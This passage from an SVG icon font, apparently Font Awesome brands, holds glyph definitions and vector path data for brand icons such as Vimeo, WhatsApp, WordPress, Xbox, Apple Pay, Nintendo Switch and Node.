c-0.599609 81.5 -54.8994 125.9 -120.8 126.4c-8.5 0.0996094 -8.5 12.8994 0 12.8994c73.7002 -0.5 133 -51.3994 133.7 -139.2zM374.9 119v-0.200195c-10.8008 -19 -31 -40 -51.8008 -33.2998l-0.199219 0.299805c-21.1006 5.90039 -70.8008 31.5 -102.2 56.5
c-16.2002 12.7998 -31 27.9004 -42.4004 42.4004c-10.2998 12.8994 -20.7002 28.2002 -30.7998 46.5996c-21.2998 38.5 -26 55.7002 -26 55.7002c-6.7002 20.7998 14.2002 41 33.2998 51.7998h0.200195c9.2002 4.7998 18 3.2002 23.9004 -3.89941
c0 0 12.3994 -14.8008 17.6992 -22.1006c5 -6.7998 11.7002 -17.7002 15.2002 -23.7998c6.10059 -10.9004 2.2998 -22 -3.7002 -26.5996l-12 -9.60059c-6.09961 -4.89941 -5.2998 -14 -5.2998 -14s17.7998 -67.2998 84.2998 -84.2998c0 0 9.10059 -0.799805 14 5.2998
l9.60059 12c4.59961 6 15.7002 9.7998 26.5996 3.7002c14.7002 -8.2998 33.4004 -21.2002 45.7998 -32.9004c7 -5.69922 8.60059 -14.3994 3.80078 -23.5996z" />
    <glyph glyph-name="vimeo" unicode="&#xf40a;" 
d="M403.2 416c24.7002 0 44.7998 -20.0996 44.7998 -44.7998v-358.4c0 -24.7002 -20.0996 -44.7998 -44.7998 -44.7998h-358.4c-24.7002 0 -44.7998 20.0996 -44.7998 44.7998v358.4c0 24.7002 20.0996 44.7998 44.7998 44.7998h358.4zM377 267.2
c1.90039 42.2002 -13.7998 63.7998 -47.0996 64.7002c-44.9004 1.39941 -75.3008 -23.9004 -91.2002 -76c19.8994 8.5 49.2998 10.7998 45.7998 -22.4004c-1 -11.2002 -8.2998 -27.5 -21.7998 -48.9004c-37.7002 -59.3994 -46.9004 -39.5996 -67.6006 91.6006
c-5.7998 36.8994 -21.2998 54.0996 -46.5 51.7002c-22.2998 -2 -57.8994 -38.4004 -95.1992 -71.2002l15.1992 -19.6006c14.5 10.1006 23 15.2002 25.4004 15.2002c21 0 31.9004 -54.7002 57.4004 -148c13.0996 -34.8994 29 -52.2998 47.8994 -52.2998
c30.4004 0 67.7002 28.5996 111.7 85.7998c42.5996 54.7002 64.5996 97.9004 66 129.4z" />
    <glyph glyph-name="vnv" unicode="&#xf40b;" horiz-adv-x="640" 
d="M104.9 96c-34.1006 0 -46.4004 30.4004 -46.4004 30.4004l-55.9004 111.5s-10.3994 18.0996 10.4004 18.0996h32.7998c10.4004 0 13.2002 -8.7002 18.7998 -18.0996l36.7002 -74.5s5.2002 -13.1006 21.1006 -13.1006c15.8994 0 21.0996 13.1006 21.0996 13.1006
l36.7002 74.5c5.59961 9.5 8.39941 18.0996 18.7998 18.0996h32.7998c20.7998 0 10.4004 -18.0996 10.4004 -18.0996l-55.7998 -111.5s-12.2002 -30.4004 -46.4004 -30.4004h-35.0996zM499.9 96c-34.1006 0 -46.4004 30.4004 -46.4004 30.4004l-55.9004 111.5
s-10.3994 18.0996 10.4004 18.0996h32.7998c10.4004 0 13.2002 -8.7002 18.7998 -18.0996l36.7002 -74.5s5.2002 -13.1006 21.1006 -13.1006c15.8994 0 21.0996 13.1006 21.0996 13.1006l36.7998 74.5c5.60059 9.5 8.40039 18.0996 18.7998 18.0996h32.9004
c20.7998 0 10.4004 -18.0996 10.4004 -18.0996l-55.9004 -111.5s-12.2002 -30.4004 -46.4004 -30.4004h-35.1992zM337.6 256c34.1006 0 46.4004 -30.4004 46.4004 -30.4004l55.9004 -111.5s10.3994 -18.0996 -10.4004 -18.0996h-32.7998
c-10.4004 0 -13.2002 8.7002 -18.7998 18.0996l-36.7002 74.5s-5.2002 13.1006 -21.1006 13.1006c-15.8994 0 -21.0996 -13.1006 -21.0996 -13.1006l-36.7002 -74.5c-5.59961 -9.39941 -8.39941 -18.0996 -18.7998 -18.0996h-32.9004
c-20.7998 0 -10.3994 18.0996 -10.3994 18.0996l55.8994 111.5s12.2002 30.4004 46.4004 30.4004h35.0996z" />
    <glyph glyph-name="whatsapp-square" unicode="&#xf40c;" 
d="M224 325.2c35.2002 0 68.2002 -13.7002 93.2002 -38.7002c24.8994 -24.9004 40.0996 -58 40.0996 -93.2002c0 -72.7002 -60.7002 -131.8 -133.3 -131.8h-0.0996094c-23.7002 0 -46.9004 6.40039 -67.1006 18.4004l-4.7998 2.89941l-49.9004 -13.0996l13.3008 48.5996
l-3.10059 5c-13.2002 20.9004 -20.2002 45.2002 -20.2002 70.1006c0.100586 72.6992 59.2002 131.8 131.9 131.8zM301.5 136.8c3.2998 9.2002 3.2998 17.2002 2.40039 19.1006c-1 1.59961 -3.60059 2.59961 -7.60059 4.59961s-23.5 11.5996 -27.0996 12.9004
c-3.60059 1.2998 -6.2998 2 -8.90039 -2c-2.59961 -3.90039 -10.2002 -12.9004 -12.5 -15.5c-2.2998 -2.7002 -4.59961 -3 -8.59961 -1c-23.2998 11.6992 -38.6006 20.7998 -53.9004 47.0996c-4.09961 7 4 6.40039 11.6006 21.5996
c1.39941 2.60059 0.699219 4.90039 -0.300781 6.90039s-8.89941 21.5 -12.1992 29.4004c-3.2002 7.69922 -6.5 6.69922 -8.90039 6.7998c-2.2998 0.0996094 -5 0.0996094 -7.59961 0.0996094c-2.7002 0 -7 -1 -10.6006 -5c-3.7002 -4 -13.8994 -13.5996 -13.8994 -33.0996
s14.1992 -38.4004 16.1992 -41c2 -2.60059 28 -42.6006 67.7002 -59.7998c25.1006 -10.8008 34.9004 -11.8008 47.5 -9.90039c7.60059 1.09961 23.4004 9.5 26.7002 18.7998zM400 416c26.5 0 48 -21.5 48 -48v-352c0 -26.5 -21.5 -48 -48 -48h-352c-26.5 0 -48 21.5 -48 48
v352c0 26.5 21.5 48 48 48h352zM223.9 34.7998c87.3994 0 160.1 71.1006 160.1 158.5c0 42.4004 -18 82.2002 -47.9004 112.2c-30 30 -69.7998 46.5 -112.199 46.5c-87.4004 0 -158.5 -71.0996 -158.601 -158.5c0 -28 7.2998 -55.2998 21.2002 -79.2998l-22.5 -82.2002
l84.0996 22.0996c23.1006 -12.5996 49.2002 -19.2998 75.8008 -19.2998z" />
    <glyph glyph-name="whmcs" unicode="&#xf40d;" 
d="M448 287l-29.0996 -7l-2.2002 -12.0996l20.8994 -18.8008l-10.2998 -20.0996l-28.7998 8.7998l-7.7998 -8.09961l8.7998 -28l-20.4004 -12.1006l-20.6992 21.6006l-11.6006 -3.5l-6.7002 -28.7998l-22.5996 0.299805l-6.7002 28.5l-11.5996 2.89941l-19.4004 -20.3994
l-19.8994 11.5996l8.09961 26.9004l-7.2002 8.59961l-29.5996 -7.5l-10.4004 18.5l20.1006 19.9004l-2.40039 12.0996l-28.7998 7.5l0.299805 21.7002l28.5 7.7998l2.90039 10.4004l-20.7002 21l11 19.0996l28.5 -7.5l8.09961 8.40039l-8.09961 27.7002l19.3994 11
l19.7002 -21l12.1006 3.19922l6.19922 26.4004h22.6006l7 -26.4004l10.7002 -3.19922l21.2998 21l19.0996 -11.6006l-7.5 -28.2002l7.2002 -7.5l29 7.5l10.4004 -19.3994l-20.1006 -20.7002l2.2002 -10.4004l28.5 -8.7998v-21.2998zM328.8 241.8
c31.4004 0 56.7998 25.2998 56.7998 56.7998c0 31.4004 -25.3994 56.8008 -56.7998 56.8008c-31.3994 0 -56.7998 -25.4004 -56.7998 -56.8008c0 -31.3994 25.5 -56.7998 56.7998 -56.7998zM401.1 225.4l46.9004 -14.5v-39.9004l-55.0996 -13.4004l-4.10059 -22.6992
l38.9004 -35.3008l-19.2002 -37.8994l-54 16.7002l-14.5996 -15.2002l16.6992 -52.5l-38.2998 -22.7002l-38.8994 40.5l-21.7002 -6.59961l-12.6006 -54l-42.3994 0.5l-12.6006 53.5996l-21.6992 5.59961l-36.4004 -38.3994l-37.4004 21.7002l15.2002 50.5l-13.7002 16.0996
l-55.5 -14.0996l-19.6992 34.7998l37.8994 37.3994l-4.7998 22.8008l-54 14.0996l0.5 40.9004l53.5 14.6992l5.7002 19.7002l-38.9004 39.4004l20.7002 35.7998l53.5996 -14.0996l15.2002 15.6992l-15.2002 52l36.4004 20.7002l36.7998 -39.3994l22.7002 6.09961l11.5996 52
h42.4004l11.5996 -45.9004l-22.5996 5.90039l-6.2998 1.7002l-3.2998 -5.7002l-11 -19.0996l-3.30078 -5.60059l4.60059 -4.59961l17.2002 -17.4004l-0.300781 -1l-23.7998 -6.5l-6.2002 -1.7002l-0.0996094 -6.39941l-0.200195 -12.9004
c-47.5 -10.3994 -83.2998 -52.7998 -83.2998 -103.5c0 -58.2998 47.2998 -105.7 105.7 -105.7c50.5 0 92.7002 35.4004 103.2 82.8008l13.1992 -0.200195l6.90039 -0.100586l1.59961 6.7002l5.60059 24l1.89941 0.600586l17.1006 -17.8008l4.7002 -4.89941l5.7998 3.39941
l20.3994 12.1006l5.80078 3.5l-2 6.5z" />
    <glyph glyph-name="wordpress-simple" unicode="&#xf411;" horiz-adv-x="512" 
d="M256 440c136.7 0 248 -111.2 248 -248c0 -136.7 -111.3 -248 -248 -248s-248 111.3 -248 248c0 136.8 111.3 248 248 248zM33 192c0 -88.2002 51.2998 -164.5 125.7 -200.7l-106.4 291.4c-12.3994 -27.7002 -19.2998 -58.4004 -19.2998 -90.7002zM256 -31
c26 0 50.9004 4.5 74 12.5996c-0.599609 1 -1.09961 2 -1.59961 3.10059l-68.5 187.8l-66.9004 -194.4c20 -5.89941 41.0996 -9.09961 63 -9.09961zM286.7 296.5l80.7002 -239.6l22.1992 74.2998c9.7002 30.8994 17 53 17 72.0996c0 27.6006 -9.89941 46.7002 -18.3994 61.5
c-11.2998 18.4004 -21.9004 33.9004 -21.9004 52.2998c0 20.5 15.5 39.6006 37.4004 39.6006c1 0 1.89941 -0.100586 2.89941 -0.200195c-39.6992 36.2998 -92.5996 58.5 -150.6 58.5c-77.9004 0 -146.4 -40 -186.3 -100.5
c5.2998 -0.200195 10.2002 -0.299805 14.3994 -0.299805c23.3008 0 59.4004 2.7998 59.4004 2.7998c12 0.700195 13.4004 -17 1.40039 -18.4004c0 0 -12.1006 -1.39941 -25.5 -2.09961l81.1992 -241.5l48.8008 146.3l-34.7002 95.2002
c-12 0.700195 -23.4004 2.09961 -23.4004 2.09961c-12 0.700195 -10.5996 19.1006 1.40039 18.4004c0 0 36.7998 -2.7998 58.7002 -2.7998c23.2998 0 59.3994 2.7998 59.3994 2.7998c12 0.700195 13.4004 -17 1.40039 -18.4004c0 0 -12.1006 -1.39941 -25.5 -2.09961z
M368.1 -0.700195c66.3008 38.6006 110.9 110.4 110.9 192.7c0 38.7998 -9.90039 75.2002 -27.2998 107c1 -7.09961 1.5 -14.7002 1.5 -22.9004c0 -22.6992 -4.2998 -48.0996 -17 -79.8994z" />
    <glyph glyph-name="xbox" unicode="&#xf412;" horiz-adv-x="512" 
d="M369.9 129.8c44.2998 -54.2998 64.6992 -98.7998 54.3994 -118.7c-7.89941 -15.0996 -56.7002 -44.5996 -92.5996 -55.8994c-29.6006 -9.2998 -68.4004 -13.2998 -100.4 -10.2002c-38.2002 3.7002 -76.8994 17.4004 -110.1 39
c-27.9004 18.2002 -34.2002 25.7002 -34.2002 40.5996c0 29.9004 32.9004 82.3008 89.2002 142.101c32 33.8994 76.5 73.7002 81.3994 72.5996c9.40039 -2.09961 84.3008 -75.0996 112.301 -109.5zM188.6 304.2c-66.3994 -81.5 -106 -155.4 -120.3 -194.4
c-9.7998 -26.5 -13.7002 -53 -9.5 -64c2.7998 -7.39941 0.200195 -4.7002 -9.2998 9.90039c-23.2002 35.5 -34.9004 70.3994 -40.5 120.899c-1.90039 16.7002 -1.2002 26.3008 4.2002 60.5c6.7998 42.7002 31.0996 92 60.2998 122.4
c12.4004 12.9004 13.5 13.2002 28.7002 8.09961c28.2998 -9.5 56.7002 -36.5 86.3994 -63.3994zM500.2 240.7c4.7002 -22.6006 5.09961 -70.9004 0.799805 -93.4004c-3.59961 -18.5 -11.2002 -42.5 -18.5996 -58.7002c-5.5 -12.1992 -19.3008 -35.7998 -25.4004 -43.5
c-3.09961 -3.89941 -3.09961 -3.89941 -1.40039 4.60059c2.30078 11.2002 -0.599609 31.5996 -7.39941 52.2998c-20.7002 62.9004 -80.5 149 -122.9 202.3c23.2998 21.4004 41 38.2998 64.2998 52.7998c11.8008 7.40039 28.7002 13.9004 36 13.9004
c7.10059 0 57.7002 -50.2998 74.6006 -130.3zM141.3 405c-14.5996 -0.700195 -14 0.0996094 9.40039 11.2002c81.2002 38.2998 170 27.5996 233.899 -11.7002c-13.3994 0.599609 -43.5 5.90039 -107.399 -25.2002c-11.2002 -5.5 -20.9004 -9.7998 -21.6006 -9.7002
c-4.59961 0.900391 -66.5996 37.9004 -114.3 35.4004z" />
    <glyph glyph-name="yandex" unicode="&#xf413;" horiz-adv-x="256" 
d="M153.1 132.2l-87.3994 -196.2h-63.7002l96 209.8c-45.0996 22.9004 -75.2002 64.4004 -75.2002 141.101c-0.0996094 107.399 68 161.1 148.9 161.1h82.2998v-512h-55.0996v196.2h-45.8008zM198.9 401.5h-29.4004c-44.4004 0 -87.4004 -29.4004 -87.4004 -114.6
c0 -82.3008 39.4004 -108.801 87.4004 -108.801h29.4004v223.4z" />
    <glyph glyph-name="yandex-international" unicode="&#xf414;" horiz-adv-x="320" 
d="M129.5 -64v166.1l-111 297.9h55.7998l81.7998 -229.7l94.1006 277.7h51.2998l-120.7 -347.8v-164.2h-51.2998z" />
    <glyph glyph-name="apple-pay" unicode="&#xf415;" horiz-adv-x="640" 
d="M116.9 289.5c-7.5 -8.90039 -19.5 -15.9004 -31.5 -14.9004c-1.5 12 4.39941 24.8008 11.2998 32.6006c7.5 9.09961 20.5996 15.5996 31.2998 16.0996c1.2002 -12.3994 -3.7002 -24.7002 -11.0996 -33.7998zM127.8 272.3c6.7998 -0.5 26.2998 -2.5 38.7998 -21.0996
c-1 -0.799805 -23.1992 -13.5 -22.8994 -40.2998c0.299805 -32 28 -42.6006 28.2998 -42.9004c-0.200195 -0.799805 -4.40039 -15.0996 -14.5 -29.9004c-8.90039 -13 -18 -25.6992 -32.5 -26c-14 -0.199219 -18.7002 8.40039 -34.7998 8.40039
c-16 0 -21.2002 -8.09961 -34.5 -8.59961c-14 -0.5 -24.6006 13.7998 -33.5 26.7998c-18.2002 26.2998 -32.1006 74 -13.2998 106.3c9.09961 16.0996 25.6992 26.2002 43.5996 26.5c13.7998 0.299805 26.4004 -9.09961 34.7998 -9.09961
c8.2002 0 23.1006 10.8994 40.5 9.89941zM228.2 308.5h73.2002c37.6992 0 64.0996 -26 64.0996 -64s-26.7998 -64.2998 -65.0996 -64.2998h-41.9004v-66.6006h-30.2998v194.9zM258.5 283v-77.4004h34.7998c26.4004 0 41.4004 14.2002 41.4004 38.8008
c0 24.5996 -15 38.5996 -41.2998 38.5996h-34.9004zM420.7 112.1c-28.1006 0 -47.7002 16.8008 -47.7998 42c0 25 19 39.4004 54.0996 41.5l37.7998 2.30078v10.7998c0 15.8994 -10.3994 24.5 -28.8994 24.5c-15.2002 0 -26.3008 -7.90039 -28.6006 -19.9004h-27.2998
c0.900391 25.2002 24.7002 43.6006 56.7998 43.6006c34.6006 0 57.1006 -18.2002 57.1006 -46.3008v-97h-28v23.4004h-0.600586c-8 -15.2998 -25.5996 -24.9004 -44.5996 -24.9004zM428.9 135.2c20.5 0 36 13 36 31.2002v11l-33.6006 -2.10059
c-18.8994 -1.09961 -28.7998 -8.2002 -28.7998 -20.5c0 -11.7998 10.2998 -19.5996 26.4004 -19.5996zM531.4 60.5996c-2.30078 0 -9.80078 0.300781 -11.6006 0.700195v23.4004c1.90039 -0.200195 6.5 -0.5 8.90039 -0.5c13.3994 0 20.8994 5.7002 25.5 20.2998
l2.7998 8.59961l-51.2002 141.9h31.6006l35.5996 -115.1h0.599609l35.6006 115.1h30.7998l-53.0996 -149c-12.1006 -34.0996 -26 -45.4004 -55.5 -45.4004z" />
    <glyph glyph-name="cc-apple-pay" unicode="&#xf416;" horiz-adv-x="576" 
d="M302.2 229.6c0 -17.1992 -10.5 -27.0996 -29 -27.0996h-24.2998v54.2002h24.3994c18.4004 0 28.9004 -9.7998 28.9004 -27.1006zM349.7 167c0 8.59961 6.89941 13.5 20.2002 14.4004l23.5 1.5v-7.7002c0 -12.7998 -10.8008 -21.9004 -25.2002 -21.9004
c-11.2998 0 -18.5 5.40039 -18.5 13.7002zM576 369v-352c0 -26.5 -21.5 -48 -48 -48h-480c-26.5 0 -48 21.5 -48 48v352c0 26.5 21.5 48 48 48h480c26.5 0 48 -21.5 48 -48zM127.8 250.8c8.40039 -0.700195 16.7998 4.2002 22.1006 10.4004
c5.19922 6.39941 8.59961 15 7.69922 23.7002c-7.39941 -0.300781 -16.5996 -4.90039 -21.8994 -11.3008c-4.7998 -5.5 -8.90039 -14.3994 -7.90039 -22.7998zM188.4 176.3c-0.200195 0.200195 -19.6006 7.60059 -19.8008 30c-0.199219 18.7002 15.3008 27.7002 16 28.2002
c-8.7998 13 -22.3994 14.4004 -27.0996 14.7002c-12.2002 0.700195 -22.5996 -6.90039 -28.4004 -6.90039c-5.89941 0 -14.6992 6.60059 -24.2998 6.40039c-12.5 -0.200195 -24.2002 -7.2998 -30.5 -18.6006c-13.0996 -22.5996 -3.39941 -56 9.2998 -74.3994
c6.2002 -9.10059 13.7002 -19.1006 23.5 -18.7002c9.30078 0.400391 13 6 24.2002 6c11.2998 0 14.5 -6 24.2998 -5.90039c10.2002 0.200195 16.5 9.10059 22.8008 18.2002c6.89941 10.4004 9.7998 20.4004 10 21zM323.8 229.7c0 26.5996 -18.5 44.7998 -44.8994 44.7998
h-51.2002v-136.4h21.2002v46.6006h29.2998c26.7998 0 45.5996 18.3994 45.5996 45zM413.8 206c0 19.7002 -15.7998 32.4004 -40 32.4004c-22.5 0 -39.0996 -12.9004 -39.7002 -30.5h19.1006c1.59961 8.39941 9.39941 13.8994 20 13.8994c13 0 20.2002 -6 20.2002 -17.2002
v-7.5l-26.4004 -1.59961c-24.5996 -1.5 -37.9004 -11.5996 -37.9004 -29.0996c0 -17.7002 13.7002 -29.4004 33.4004 -29.4004c13.2998 0 25.5996 6.7002 31.2002 17.4004h0.399414v-16.4004h19.6006v68h0.0996094zM516 237.1h-21.5l-24.9004 -80.5996h-0.399414
l-24.9004 80.5996h-22.2998l35.9004 -99.2998l-1.90039 -6c-3.2002 -10.2002 -8.5 -14.2002 -17.9004 -14.2002c-1.69922 0 -4.89941 0.200195 -6.19922 0.300781v-16.4004c1.19922 -0.400391 6.5 -0.5 8.09961 -0.5c20.7002 0 30.4004 7.90039 38.9004 31.7998z" />
    <glyph glyph-name="fly" unicode="&#xf417;" horiz-adv-x="383" 
d="M197.8 20.2002c12.9004 -11.7002 33.7002 -33.2998 33.2002 -50.7002c0 -0.799805 -0.0996094 -1.59961 -0.0996094 -2.5c-1.80078 -19.7998 -18.8008 -31.0996 -39.1006 -31c-25 0.0996094 -39.8994 16.7998 -38.7002 35.7998c1 16.2002 20.5 36.7002 32.4004 47.6006
c2.2998 2.09961 2.7002 2.69922 5.59961 3.59961c3.40039 0 3.90039 -0.299805 6.7002 -2.7998zM331.9 380.7c23.8994 -40 27.7998 -73.2998 20.7998 -112.5c-15.2002 -69.9004 -103.601 -166.5 -155.9 -215.7c-1.7002 -1.59961 -1.39941 -1.40039 -3.5 -2.09961
l-3.2998 0.0996094c-1.7002 0.599609 -4.5 3.5 -6.2002 5.09961c-58.7998 57.8008 -148.7 151.601 -155.8 233.801c-1.5 71.3994 29.2998 113.399 82.9004 141.3c9.89941 4.09961 37 17.2998 81.0996 17.2998c22 0.200195 51.0996 -4.5 76.5996 -15.2002
c24.7002 -11.5 47 -26.3994 63.3008 -52.0996zM186.8 96.0996v325.7c-57.8994 -5.5 -72.7002 -89.2002 -69.2998 -136.7c4.09961 -58.2998 41.2998 -137.899 69.2998 -189zM328.7 268c15.7998 54.9004 -10.9004 134.7 -99.7002 153
c38.2002 -25.5996 49.5996 -85.5 48 -131.4c-2 -58.5996 -39.4004 -140 -67.2002 -191.899c41.6006 42.2998 102.5 113.5 118.9 170.3z" />
    <glyph glyph-name="nintendo-switch" unicode="&#xf418;" 
d="M95.9004 414.5c5.7998 1 19.0996 1.2998 63.2998 1.40039c54.3994 0.0996094 56 0 56.8994 -1.7002c0.600586 -1.2998 0.900391 -72.1006 0.900391 -222.601c0 -202.899 -0.0996094 -220.8 -1.5 -222.199c-1.40039 -1.40039 -6.7998 -1.5 -58.7002 -1.10059
c-50.2002 0.200195 -58 0.5 -64.0996 1.90039c-47 10.8994 -80 44 -90.2998 90.5c-1.90039 8.7002 -2 11.2998 -2.2002 122.899c-0.5 121.601 -0.200195 130.801 3.89941 146.5c11.3008 43.4004 47.2002 76.4004 91.8008 84.4004zM179.8 191.9h-0.200195v188
l-35.8994 -0.100586c-39.7002 -0.0996094 -45.4004 -0.700195 -57.6006 -5.59961c-24.2998 -9.7002 -42.3994 -31.2998 -48 -57.4004c-1.89941 -9.2002 -1.89941 -239.899 0.100586 -249.3c6.2998 -30 28.3994 -53 58.2998 -60.7002
c7 -1.7002 10.7002 -1.89941 45.5 -2.2998l37.7998 -0.5v187.9zM103.9 323.1c23.2998 4.7002 46 -11.2998 49.8994 -35c3.5 -20.0996 -8.7002 -39.5996 -28.7998 -46.3994c-4.90039 -1.7002 -7.5 -2 -14.7998 -1.7002c-8.10059 0.299805 -9.7002 0.599609 -15.9004 3.7002
c-9 4.39941 -15.5 11 -19.8994 20c-3 5.89941 -3.40039 7.89941 -3.80078 15.2002c-0.799805 14.0996 4.10059 26.0996 13.8008 34.5c4.7998 4.09961 13.6992 8.59961 19.5 9.69922zM262.1 415.4c0.300781 0.299805 18.8008 0.599609 41.2002 0.5
c32.2998 0 42.2998 -0.300781 48.7998 -1.40039c48.4004 -8.2998 85.3008 -44.7998 94.5 -93.0996c1.30078 -6.7002 1.5 -22.6006 1.5 -129c0 -133.301 0.100586 -128.7 -5.69922 -146.101c-1.60059 -4.5 -4.7002 -11.7998 -7 -16.2002
c-18 -34 -51.3008 -56.8994 -89 -61.1992c-8.90039 -1 -80.9004 -1.30078 -83.4004 -0.400391c-1.40039 0.599609 -1.5 21.0996 -1.5 223.4c0 122.699 0.200195 223.199 0.599609 223.5zM361.2 213.3c-23.2002 6.10059 -47.2998 -7.2998 -54.2002 -30
c-2.2998 -7.2998 -2.40039 -19.2002 -0.400391 -26.2002c6.7002 -23 31.4004 -37 54.6006 -31c14.2998 3.80078 25.3994 14.1006 31.0996 28.8008c3.10059 8 3.2002 20.7998 0.100586 29.5c-4.90039 14.0996 -16.7002 25.0996 -31.2002 28.8994z" />
    <glyph glyph-name="node" unicode="&#xf419;" horiz-adv-x="640" 
d="M316.3 -4c-2.09961 0 -4.2002 0.599609 -6.09961 1.59961l-19.2002 11.4004c-2.90039 1.59961 -1.5 2.2002 -0.5 2.5c3.7998 1.2998 4.59961 1.59961 8.7002 4c0.399414 0.200195 1 0.0996094 1.39941 -0.0996094l14.8008 -8.80078
c0.5 -0.299805 1.2998 -0.299805 1.7998 0l57.7998 33.4004c0.5 0.299805 0.900391 0.900391 0.900391 1.59961v66.7002c0 0.700195 -0.300781 1.2998 -0.900391 1.60059l-57.7998 33.2998c-0.5 0.299805 -1.2002 0.299805 -1.7998 0l-57.8008 -33.2998
c-0.599609 -0.300781 -0.899414 -1 -0.899414 -1.60059v-66.7002c0 -0.599609 0.399414 -1.19922 0.899414 -1.5l15.8008 -9.09961c8.59961 -4.2998 13.8994 0.799805 13.8994 5.7998v65.9004c0 0.899414 0.700195 1.7002 1.7002 1.7002h7.2998
c0.900391 0 1.7002 -0.700195 1.7002 -1.7002v-65.9004c0 -11.5 -6.2002 -18 -17.0996 -18c-3.30078 0 -6 0 -13.3008 3.60059l-15.1992 8.69922c-3.7002 2.2002 -6.10059 6.2002 -6.10059 10.5v66.7002c0 4.2998 2.2998 8.40039 6.10059 10.5l57.7998 33.4004
c3.7002 2.09961 8.5 2.09961 12.0996 0l57.7998 -33.4004c3.7002 -2.2002 6.10059 -6.2002 6.10059 -10.5v-66.7002c0 -4.2998 -2.2998 -8.39941 -6.10059 -10.5l-57.7998 -33.3994c-1.7002 -1.10059 -3.7998 -1.7002 -6 -1.7002zM363 61.7998
c0 -12.5996 -10.5 -19.7998 -29 -19.7998c-25.2998 0 -30.5996 11.5996 -30.5996 21.2998c0 1 0.799805 1.7002 1.69922 1.7002h7.5c0.900391 0 1.60059 -0.599609 1.7002 -1.40039c1.10059 -7.59961 4.5 -11.3994 19.7998 -11.3994
c12.2002 0 17.4004 2.7002 17.4004 9.2002c0 3.69922 -1.5 6.39941 -20.4004 8.2998c-15.7998 1.59961 -25.5996 5 -25.5996 17.7002c0 11.5996 9.7998 18.5996 26.2998 18.5996c18.5 0 27.6006 -6.40039 28.7998 -20.2002
c0.100586 -0.5 -0.0996094 -0.899414 -0.399414 -1.2998c-0.299805 -0.299805 -0.700195 -0.5 -1.2002 -0.5h-7.5c-0.799805 0 -1.40039 0.5 -1.59961 1.2998c-1.80078 8 -6.2002 10.6006 -18.1006 10.6006c-13.2998 0 -14.7998 -4.60059 -14.7998 -8.10059
c0 -4.2002 1.7998 -5.39941 19.7998 -7.7998c17.7998 -2.40039 26.2002 -5.7002 26.2002 -18.2002zM417.5 111.9c0 -6.10059 -5 -11.1006 -11.0996 -11.1006c-6.10059 0 -11.1006 5 -11.1006 11.1006c0 6.2998 5.2002 11.0996 11.1006 11.0996
c6 0.0996094 11.0996 -4.7998 11.0996 -11.0996zM415.7 111.9c0 5.19922 -4.2002 9.2998 -9.40039 9.2998c-5.09961 0 -9.2998 -4.10059 -9.2998 -9.2998c0 -5.2002 4.2002 -9.40039 9.2998 -9.40039c5.2002 0.0996094 9.40039 4.2998 9.40039 9.40039zM411.2 105.7
h-2.60059c-0.0996094 0.599609 -0.5 3.7998 -0.5 3.89941c-0.199219 0.700195 -0.399414 1.10059 -1.2998 1.10059h-2.2002v-5h-2.39941v12.5h4.2998c1.5 0 4.40039 0 4.40039 -3.2998c0 -2.30078 -1.5 -2.80078 -2.40039 -3.10059
c1.7002 -0.0996094 1.7998 -1.2002 2.09961 -2.7998c0.100586 -1 0.300781 -2.7002 0.600586 -3.2998zM408.4 114.5c0 1.7002 -1.2002 1.7002 -1.80078 1.7002h-2v-3.5h1.90039c1.59961 0 1.90039 1.09961 1.90039 1.7998zM137.3 257l-0.200195 -95
c0 -1.2998 -0.699219 -2.59961 -1.7998 -3.2002c-1.09961 -0.700195 -2.59961 -0.700195 -3.7002 0l-36.3994 20.9004c-2.2998 1.2998 -3.7002 3.7998 -3.7002 6.39941v44.4004c0 2.59961 -1.40039 5.09961 -3.7002 6.40039l-15.5 8.89941
c-1.09961 0.700195 -2.39941 1 -3.7002 1c-1.2998 0 -2.5 -0.299805 -3.69922 -1l-15.5 -8.89941c-2.30078 -1.30078 -3.7002 -3.80078 -3.7002 -6.40039v-44.4004c0 -2.59961 -1.40039 -5 -3.7002 -6.39941l-36.4004 -20.9004
c-1.19922 -0.700195 -2.59961 -0.700195 -3.69922 0c-1.10059 0.700195 -1.80078 1.90039 -1.80078 3.2002l-0.0996094 95c0 2.59961 1.40039 5.09961 3.7002 6.40039l61.2002 35.2998c1.09961 0.599609 2.19922 1 3.39941 1h0.600586
c1.19922 -0.100586 2.39941 -0.400391 3.39941 -1l61.2998 -35.2998c2.30078 -1.30078 3.7002 -3.7002 3.7002 -6.40039zM472.5 360.7v-176.4c0 -2.59961 -1.40039 -5.09961 -3.7002 -6.39941l-61.2998 -35.4004c-2.2998 -1.2998 -5.09961 -1.2998 -7.40039 0
l-61.2998 35.4004c-2.2998 1.2998 -3.7002 3.7998 -3.7002 6.39941v70.7998c0 2.60059 1.40039 5.10059 3.7002 6.40039l61.2998 35.4004c2.30078 1.2998 5.10059 1.2998 7.40039 0l15.2998 -8.80078c1.7002 -1 3.90039 0.300781 3.90039 2.2002v94
c0 2.7998 3 4.60059 5.5 3.2002l36.5 -20.4004c2.2998 -1.19922 3.7998 -3.69922 3.7998 -6.39941zM426.5 231.8c0 0.700195 -0.400391 1.2998 -0.900391 1.60059l-21 12.1992c-0.599609 0.300781 -1.2998 0.300781 -1.89941 0l-21 -12.1992
c-0.600586 -0.300781 -0.900391 -0.900391 -0.900391 -1.60059v-24.2998c0 -0.700195 0.400391 -1.2998 0.900391 -1.59961l21 -12.1006c0.599609 -0.299805 1.2998 -0.299805 1.7998 0l21 12.1006c0.599609 0.299805 0.900391 0.899414 0.900391 1.59961v24.2998h0.0996094
zM636.3 232.5l-36.7002 -21.2998c-2.5 -1.40039 -5.59961 0.399414 -5.59961 3.2002v17.3994c0 1.2998 -0.799805 2.5 -1.90039 3.2002l-19.1992 11.0996c-1.10059 0.700195 -2.60059 0.700195 -3.7002 0l-19.2002 -11.0996
c-1.2002 -0.700195 -1.90039 -1.90039 -1.90039 -3.2002v-22.2002c0 -1.2998 0.700195 -2.5 1.90039 -3.19922l61.7002 -35.4004c2.5 -1.40039 2.5 -5 0 -6.40039l-36.7998 -20.5c-2.30078 -1.2998 -5.10059 -1.2998 -7.30078 0l-60.8994 34.7002
c-2.2998 1.2998 -3.7002 3.7002 -3.7002 6.40039v70.7998c0 2.59961 1.40039 5.09961 3.7002 6.40039l61.2998 35.3994c2.2998 1.2998 5.09961 1.2998 7.40039 0l60.8994 -35.3994c2.2998 -1.30078 3.7002 -3.80078 3.7002 -6.40039v-17.0996
